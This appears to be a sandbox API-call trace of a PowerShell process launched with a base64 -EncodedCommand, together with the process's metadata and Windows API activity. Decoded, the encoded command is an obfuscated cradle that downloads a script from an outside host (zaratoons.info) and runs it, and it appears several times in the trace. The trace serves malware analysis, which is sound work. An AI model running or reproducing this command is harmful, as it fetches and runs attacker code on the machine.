	[0876.960] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.EXE", lpFindFileData=0x1c6eda00 | out: lpFindFileData=0x1c6eda00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x82dd7f7c, ftCreationTime.dwHighDateTime=0x1ca0414, ftLastAccessTime.dwLowDateTime=0x82dd7f7c, ftLastAccessTime.dwHighDateTime=0x1ca0414, ftLastWriteTime.dwLowDateTime=0xe84fc9b0, ftLastWriteTime.dwHighDateTime=0x1ca0423, nFileSizeHigh=0x0, nFileSizeLow=0x73a00, dwReserved0=0x0, dwReserved1=0x0, cFileName="powershell.exe", cAlternateFileName="")) returned 0x2bf200
	[0876.961] FindNextFileW (in: hFindFile=0x2bf200, lpFindFileData=0x1c6eda10 | out: lpFindFileData=0x1c6eda10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x82dd7f7c, ftCreationTime.dwHighDateTime=0x1ca0414, ftLastAccessTime.dwLowDateTime=0x82dd7f7c, ftLastAccessTime.dwHighDateTime=0x1ca0414, ftLastWriteTime.dwLowDateTime=0xe84fc9b0, ftLastWriteTime.dwHighDateTime=0x1ca0423, nFileSizeHigh=0x0, nFileSizeLow=0x73a00, dwReserved0=0x0, dwReserved1=0x0, cFileName="powershell.exe", cAlternateFileName="")) returned 0
	[0876.962] FindClose (in: hFindFile=0x2bf200 | out: hFindFile=0x2bf200) returned 1
	[0876.962] SetErrorMode (uMode=0x1) returned 0x1
	[0876.963] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", nBufferLength=0x105, lpBuffer=0x1c6edb20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", lpFilePart=0x0) returned 0x39
	[0876.963] SetErrorMode (uMode=0x1) returned 0x1
	[0876.963] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe"), fInfoLevelId=0x0, lpFileInformation=0x1c6edd30 | out: lpFileInformation=0x1c6edd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x82dd7f7c, ftCreationTime.dwHighDateTime=0x1ca0414, ftLastAccessTime.dwLowDateTime=0x82dd7f7c, ftLastAccessTime.dwHighDateTime=0x1ca0414, ftLastWriteTime.dwLowDateTime=0xe84fc9b0, ftLastWriteTime.dwHighDateTime=0x1ca0423, nFileSizeHigh=0x0, nFileSizeLow=0x73a00)) returned 1
	[0876.963] SetErrorMode (uMode=0x1) returned 0x1
	[0876.964] CoTaskMemAlloc (cb=0x104) returned 0x2b4e60
	[0876.964] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2b4e60, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0876.964] CoTaskMemFree (pv=0x2b4e60) 
	[0876.966] CoTaskMemAlloc (cb=0x104) returned 0x2b4e60
	[0876.966] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2b4e60, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0876.966] CoTaskMemFree (pv=0x2b4e60) 
	[0876.969] CoTaskMemAlloc (cb=0x104) returned 0x2b4e60
	[0876.969] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2b4e60, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0876.969] CoTaskMemFree (pv=0x2b4e60) 
	[0877.526] CoTaskMemAlloc (cb=0x104) returned 0x2b4e60
	[0877.526] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2b4e60, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0877.526] CoTaskMemFree (pv=0x2b4e60) 
	[0877.539] CoTaskMemAlloc (cb=0x3b) returned 0x2ad820
	[0877.539] SHGetFileInfoA (in: pszPath="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", dwFileAttributes=0x0, psfi=0x1c6edf18, cbFileInfo=0x168, uFlags=0x2000 | out: psfi=0x1c6edf18) returned 0x4550
	[0877.542] CoTaskMemFree (pv=0x2ad820) 
	[0877.545] GetConsoleWindow () returned 0x1032a
	[0878.114] CoTaskMemAlloc (cb=0x104) returned 0x2b4e60
	[0878.114] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2b4e60, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0878.114] CoTaskMemFree (pv=0x2b4e60) 
	[0878.115] CoTaskMemAlloc (cb=0x104) returned 0x2b4e60
	[0878.115] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x2b4e60, nSize=0x80 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35
	[0878.115] CoTaskMemFree (pv=0x2b4e60) 
	[0878.121] CoTaskMemAlloc (cb=0x104) returned 0x2b4e60
	[0878.121] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x2b4e60, nSize=0x80 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35
	[0878.121] CoTaskMemFree (pv=0x2b4e60) 
	[0878.124] CommandLineToArgvW (in: lpCmdLine=" -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==", pNumArgs=0x1c6edf60 | out: pNumArgs=0x1c6edf60) returned 0x22cfb0*=""
	[0878.125] lstrlenW (lpString="-EncodedCommand") returned 15
	[0878.126] CoTaskMemAlloc (cb=0x22) returned 0x1b755270
	[0878.126] RtlMoveMemory (in: Destination=0x1b755270, Source=0x22cfd2, Length=0x20 | out: Destination=0x1b755270) 
	[0878.126] CoTaskMemFree (pv=0x1b755270) 
	[0878.126] lstrlenW (lpString="JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==") returned 376
	[0878.126] CoTaskMemAlloc (cb=0x2f4) returned 0x1b7468e0
	[0878.126] RtlMoveMemory (in: Destination=0x1b7468e0, Source=0x22cff2, Length=0x2f2 | out: Destination=0x1b7468e0) 
	[0878.126] CoTaskMemFree (pv=0x1b7468e0) 
	[0878.127] LocalFree (hMem=0x22cfb0) returned 0x0
	[0878.128] CoTaskMemAlloc (cb=0x804) returned 0x246630
	[0878.128] GetConsoleTitleW (in: lpConsoleTitle=0x246630, nSize=0x400 | out: lpConsoleTitle="Administrator: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe") returned 0x48
	[0878.128] CoTaskMemFree (pv=0x246630) 
	[0878.140] CoTaskMemAlloc (cb=0x38e) returned 0x22cfb0
	[0878.140] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"  -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x0, lpEnvironment=0x0, lpCurrentDirectory="C:\\Windows\\system32", lpStartupInfo=0x1c6edec0*(cb=0x68, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x2e1bf48 | out: lpCommandLine="\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"  -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==", lpProcessInformation=0x2e1bf48*(hProcess=0x390, hThread=0x344, dwProcessId=0x2564, dwThreadId=0x2568)) returned 1
	[0878.146] CoTaskMemFree (pv=0x22cfb0) 
	[0878.147] CloseHandle (hObject=0x344) returned 1
	[0878.148] CoTaskMemAlloc (cb=0x3b) returned 0x2ad820
	[0878.148] SHGetFileInfoA (in: pszPath="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", dwFileAttributes=0x0, psfi=0x1c6edf68, cbFileInfo=0x168, uFlags=0x2000 | out: psfi=0x1c6edf68) returned 0x4550
	[0878.148] CoTaskMemFree (pv=0x2ad820) 
	[0878.151] GetCurrentProcess () returned 0xffffffffffffffff
	[0878.151] GetCurrentProcess () returned 0xffffffffffffffff
	[0878.152] DuplicateHandle (in: hSourceProcessHandle=0xffffffffffffffff, hSourceHandle=0x390, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0x1c6ee048, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x1c6ee048*=0x344) returned 1

Process:
	id = "38"
	image_name = "powershell.exe"
	filename = "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe"
	page_root = "0x3da2c000"
	os_pid = "0xc20"
	os_integrity_level = "0x3000"
	os_privileges = "0x60800000"
	monitor_reason = "child_process"
	parent_id = "1"
	os_parent_pid = "0xb40"
	cmd_line = "\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" powershell -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA=="
	cur_dir = "C:\\Windows\\system32\\"
	os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz"
	bitness = "64"
	os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]


Thread:
	id = 211
	os_tid = 0xc24

	[0297.792] CreateMutexW (lpMutexAttributes=0x0, bInitialOwner=0, lpName=0x0) returned 0x68
	[0394.026] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0
	[0395.224] SysStringByteLen (bstr="Microsoft.PowerShell.ConsoleHost, Version=1.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, ProcessorArchitecture=msil") returned 0xfe
	[0395.225] SysStringByteLen (bstr="Microsoft.PowerShell.ConsoleHost, Version=1.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, ProcessorArchitecture=msil") returned 0xfe
	[0395.225] SysStringByteLen (bstr="Microsoft.PowerShell.UnmanagedPSEntry") returned 0x4a
	[0395.225] SysStringByteLen (bstr="Microsoft.PowerShell.UnmanagedPSEntry") returned 0x4a
	[0398.238] GetVersionExW (in: lpVersionInformation=0x18e000*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x18e000*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0398.241] GetVersionExW (in: lpVersionInformation=0x18e000*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x18e000*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0398.248] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x18dc20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0398.253] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x18dcc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0398.254] GetVersionExW (in: lpVersionInformation=0x18dd70*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x18dd70*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0398.254] SetErrorMode (uMode=0x1) returned 0x1
	[0398.255] GetFileAttributesExW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll" (normalized: "c:\\windows\\assembly\\gac_msil\\system.management.automation\\1.0.0.0__31bf3856ad364e35\\system.management.automation.dll"), fInfoLevelId=0x0, lpFileInformation=0x18ded0 | out: lpFileInformation=0x18ded0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa85ac0a8, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xa85ac0a8, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xa85d2208, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x2df000)) returned 1
	[0398.256] SetErrorMode (uMode=0x1) returned 0x1
	[0398.260] GetFileVersionInfoSizeW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpdwHandle=0x18e140 | out: lpdwHandle=0x18e140) returned 0x94c
	[0398.261] GetFileVersionInfoW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", dwHandle=0x0, dwLen=0x94c, lpData=0x2c672d8 | out: lpData=0x2c672d8) returned 1
	[0398.264] VerQueryValueW (in: pBlock=0x2c672d8, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x18e0b8, puLen=0x18e0b0 | out: lplpBuffer=0x18e0b8*=0x2c67374, puLen=0x18e0b0) returned 1
	[0398.266] lstrlenW (lpString="䅁") returned 1
	[0398.634] VerQueryValueW (in: pBlock=0x2c672d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\CompanyName", lplpBuffer=0x18e028, puLen=0x18e020 | out: lplpBuffer=0x18e028*=0x2c67450, puLen=0x18e020) returned 1
	[0398.635] lstrlenW (lpString="Microsoft Corporation") returned 21
	[0398.637] CoTaskMemAlloc (cb=0x2e) returned 0x1f90a0
	[0398.637] lstrcpyW (in: lpString1=0x1f90a0, lpString2="Microsoft Corporation" | out: lpString1="Microsoft Corporation") returned="Microsoft Corporation"
	[0398.638] CoTaskMemFree (pv=0x1f90a0) 
	[0398.638] VerQueryValueW (in: pBlock=0x2c672d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileDescription", lplpBuffer=0x18e028, puLen=0x18e020 | out: lplpBuffer=0x18e028*=0x2c674a4, puLen=0x18e020) returned 1
	[0398.638] lstrlenW (lpString="System.Management.Automation") returned 28
	[0398.638] CoTaskMemAlloc (cb=0x3c) returned 0x1c9860
	[0398.638] lstrcpyW (in: lpString1=0x1c9860, lpString2="System.Management.Automation" | out: lpString1="System.Management.Automation") returned="System.Management.Automation"
	[0398.638] CoTaskMemFree (pv=0x1c9860) 
	[0398.638] VerQueryValueW (in: pBlock=0x2c672d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileVersion", lplpBuffer=0x18e028, puLen=0x18e020 | out: lplpBuffer=0x18e028*=0x2c67500, puLen=0x18e020) returned 1
	[0398.638] lstrlenW (lpString="6.1.7601.17514") returned 14
	[0398.638] CoTaskMemAlloc (cb=0x20) returned 0x28ffc0
	[0398.638] lstrcpyW (in: lpString1=0x28ffc0, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514"
	[0398.638] CoTaskMemFree (pv=0x28ffc0) 
	[0398.638] VerQueryValueW (in: pBlock=0x2c672d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\InternalName", lplpBuffer=0x18e028, puLen=0x18e020 | out: lplpBuffer=0x18e028*=0x2c67540, puLen=0x18e020) returned 1
	[0398.639] lstrlenW (lpString="System.Management.Automation.dll") returned 32
	[0398.639] CoTaskMemAlloc (cb=0x44) returned 0x1c9860
	[0398.639] lstrcpyW (in: lpString1=0x1c9860, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll"
	[0398.639] CoTaskMemFree (pv=0x1c9860) 
	[0398.639] VerQueryValueW (in: pBlock=0x2c672d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalCopyright", lplpBuffer=0x18e028, puLen=0x18e020 | out: lplpBuffer=0x18e028*=0x2c675a8, puLen=0x18e020) returned 1
	[0398.639] lstrlenW (lpString="Copyright (c) Microsoft Corporation. All rights reserved.") returned 57
	[0398.639] CoTaskMemAlloc (cb=0x76) returned 0x234ad0
	[0398.639] lstrcpyW (in: lpString1=0x234ad0, lpString2="Copyright (c) Microsoft Corporation. All rights reserved." | out: lpString1="Copyright (c) Microsoft Corporation. All rights reserved.") returned="Copyright (c) Microsoft Corporation. All rights reserved."
	[0398.639] CoTaskMemFree (pv=0x234ad0) 
	[0398.639] VerQueryValueW (in: pBlock=0x2c672d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\OriginalFilename", lplpBuffer=0x18e028, puLen=0x18e020 | out: lplpBuffer=0x18e028*=0x2c67644, puLen=0x18e020) returned 1
	[0398.639] lstrlenW (lpString="System.Management.Automation.dll") returned 32
	[0398.639] CoTaskMemAlloc (cb=0x44) returned 0x1c9860
	[0398.639] lstrcpyW (in: lpString1=0x1c9860, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll"
	[0398.639] CoTaskMemFree (pv=0x1c9860) 
	[0398.639] VerQueryValueW (in: pBlock=0x2c672d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductName", lplpBuffer=0x18e028, puLen=0x18e020 | out: lplpBuffer=0x18e028*=0x2c676a8, puLen=0x18e020) returned 1
	[0398.639] lstrlenW (lpString="Microsoft (R) Windows (R) Operating System") returned 42
	[0398.639] CoTaskMemAlloc (cb=0x58) returned 0x1e51e0
	[0398.639] lstrcpyW (in: lpString1=0x1e51e0, lpString2="Microsoft (R) Windows (R) Operating System" | out: lpString1="Microsoft (R) Windows (R) Operating System") returned="Microsoft (R) Windows (R) Operating System"
	[0398.639] CoTaskMemFree (pv=0x1e51e0) 
	[0398.639] VerQueryValueW (in: pBlock=0x2c672d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductVersion", lplpBuffer=0x18e028, puLen=0x18e020 | out: lplpBuffer=0x18e028*=0x2c67724, puLen=0x18e020) returned 1
	[0398.639] lstrlenW (lpString="6.1.7601.17514") returned 14
	[0398.639] CoTaskMemAlloc (cb=0x20) returned 0x28ffc0
	[0398.639] lstrcpyW (in: lpString1=0x28ffc0, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514"
	[0398.639] CoTaskMemFree (pv=0x28ffc0) 
	[0398.639] VerQueryValueW (in: pBlock=0x2c672d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\Comments", lplpBuffer=0x18e028, puLen=0x18e020 | out: lplpBuffer=0x18e028*=0x2c673cc, puLen=0x18e020) returned 1
	[0398.639] lstrlenW (lpString="Microsoft Windows PowerShell Engine Core Assembly") returned 49
	[0398.639] CoTaskMemAlloc (cb=0x66) returned 0x1fb990
	[0398.639] lstrcpyW (in: lpString1=0x1fb990, lpString2="Microsoft Windows PowerShell Engine Core Assembly" | out: lpString1="Microsoft Windows PowerShell Engine Core Assembly") returned="Microsoft Windows PowerShell Engine Core Assembly"
	[0398.639] CoTaskMemFree (pv=0x1fb990) 
	[0398.640] VerQueryValueW (in: pBlock=0x2c672d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalTrademarks", lplpBuffer=0x18e028, puLen=0x18e020 | out: lplpBuffer=0x18e028*=0x0, puLen=0x18e020) returned 0
	[0398.640] VerQueryValueW (in: pBlock=0x2c672d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\PrivateBuild", lplpBuffer=0x18e028, puLen=0x18e020 | out: lplpBuffer=0x18e028*=0x0, puLen=0x18e020) returned 0
	[0398.640] VerQueryValueW (in: pBlock=0x2c672d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\SpecialBuild", lplpBuffer=0x18e028, puLen=0x18e020 | out: lplpBuffer=0x18e028*=0x0, puLen=0x18e020) returned 0
	[0398.640] VerQueryValueW (in: pBlock=0x2c672d8, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x18dff8, puLen=0x18dff0 | out: lplpBuffer=0x18dff8*=0x2c67374, puLen=0x18dff0) returned 1
	[0398.641] CoTaskMemAlloc (cb=0x204) returned 0x22c970
	[0398.641] VerLanguageNameW (in: wLang=0x0, szLang=0x22c970, cchLang=0x100 | out: szLang="Language Neutral") returned 0x10
	[0398.642] CoTaskMemFree (pv=0x22c970) 
	[0398.642] VerQueryValueW (in: pBlock=0x2c672d8, lpSubBlock="\\", lplpBuffer=0x18e048, puLen=0x18e040 | out: lplpBuffer=0x18e048*=0x2c67300, puLen=0x18e040) returned 1
	[0398.648] GetCurrentProcessId () returned 0xc20
	[0398.664] LookupPrivilegeValueW (in: lpSystemName=0x0, lpName="SeDebugPrivilege", lpLuid=0x18cf70 | out: lpLuid=0x18cf70*(LowPart=0x14, HighPart=0)) returned 1
	[0399.047] GetCurrentProcess () returned 0xffffffffffffffff
	[0399.048] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x20, TokenHandle=0x18cf90 | out: TokenHandle=0x18cf90*=0x2e0) returned 1
	[0399.049] AdjustTokenPrivileges (in: TokenHandle=0x2e0, DisableAllPrivileges=0, NewState=0x2c6ab50*(PrivilegesCount=0x1, Privileges=((Luid.LowPart=0x14, Luid.HighPart=0, Attributes=0x2))), BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1
	[0399.050] CloseHandle (hObject=0x2e0) returned 1
	[0399.055] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xc20) returned 0x2e0
	[0399.064] EnumProcessModules (in: hProcess=0x2e0, lphModule=0x2c6abb8, cb=0x200, lpcbNeeded=0x18dfa8 | out: lphModule=0x2c6abb8, lpcbNeeded=0x18dfa8) returned 1
	[0399.066] GetModuleInformation (in: hProcess=0x2e0, hModule=0x13f370000, lpmodinfo=0x2c6ae28, cb=0x18 | out: lpmodinfo=0x2c6ae28*(lpBaseOfDll=0x13f370000, SizeOfImage=0x77000, EntryPoint=0x13f37c63c)) returned 1
	[0399.067] CoTaskMemAlloc (cb=0x804) returned 0x29a0e0
	[0399.067] GetModuleBaseNameW (in: hProcess=0x2e0, hModule=0x13f370000, lpBaseName=0x29a0e0, nSize=0x800 | out: lpBaseName="powershell.exe") returned 0xe
	[0399.068] CoTaskMemFree (pv=0x29a0e0) 
	[0399.068] CoTaskMemAlloc (cb=0x804) returned 0x29a0e0
	[0399.068] GetModuleFileNameExW (in: hProcess=0x2e0, hModule=0x13f370000, lpFilename=0x29a0e0, nSize=0x800 | out: lpFilename="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe")) returned 0x39
	[0399.068] CoTaskMemFree (pv=0x29a0e0) 
	[0399.069] CloseHandle (hObject=0x2e0) returned 1
	[0399.077] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0xc20) returned 0x2e0
	[0399.078] GetExitCodeProcess (in: hProcess=0x2e0, lpExitCode=0x18e0d8 | out: lpExitCode=0x18e0d8*=0x103) returned 1
	[0399.414] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x12c6b088, Length=0x20000, ResultLength=0x18e0a0 | out: SystemInformation=0x12c6b088, ResultLength=0x18e0a0*=0x22fe8) returned 0xc0000004
	[0399.416] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x12c8b0b8, Length=0x257e8, ResultLength=0x18e0a0 | out: SystemInformation=0x12c8b0b8, ResultLength=0x18e0a0*=0x22fe8) returned 0x0
	[0399.428] EnumWindows (lpEnumFunc=0x27a66ac, lParam=0x0) returned 1
	[0399.429] GetWindowThreadProcessId (in: hWnd=0x10090, lpdwProcessId=0x18de00 | out: lpdwProcessId=0x18de00) returned 0x4d0
	[0399.429] GetWindowThreadProcessId (in: hWnd=0x3013e, lpdwProcessId=0x18de00 | out: lpdwProcessId=0x18de00) returned 0x558
	[0399.429] GetWindowThreadProcessId (in: hWnd=0x201ba, lpdwProcessId=0x18de00 | out: lpdwProcessId=0x18de00) returned 0x4d0
	[0399.429] GetWindowThreadProcessId (in: hWnd=0x300fe, lpdwProcessId=0x18de00 | out: lpdwProcessId=0x18de00) returned 0x4d0
	[0399.429] GetWindowThreadProcessId (in: hWnd=0x400ae, lpdwProcessId=0x18de00 | out: lpdwProcessId=0x18de00) returned 0x4d0
	[0399.429] GetWindowThreadProcessId (in: hWnd=0x10146, lpdwProcessId=0x18de00 | out: lpdwProcessId=0x18de00) returned 0x538
	[0399.429] GetWindowThreadProcessId (in: hWnd=0x20118, lpdwProcessId=0x18de00 | out: lpdwProcessId=0x18de00) returned 0x4d0
	[0399.429] GetWindowThreadProcessId (in: hWnd=0x2001e, lpdwProcessId=0x18de00 | out: lpdwProcessId=0x18de00) returned 0x778
	[0399.429] GetWindowThreadProcessId (in: hWnd=0x20028, lpdwProcessId=0x18de00 | out: lpdwProcessId=0x18de00) returned 0x778
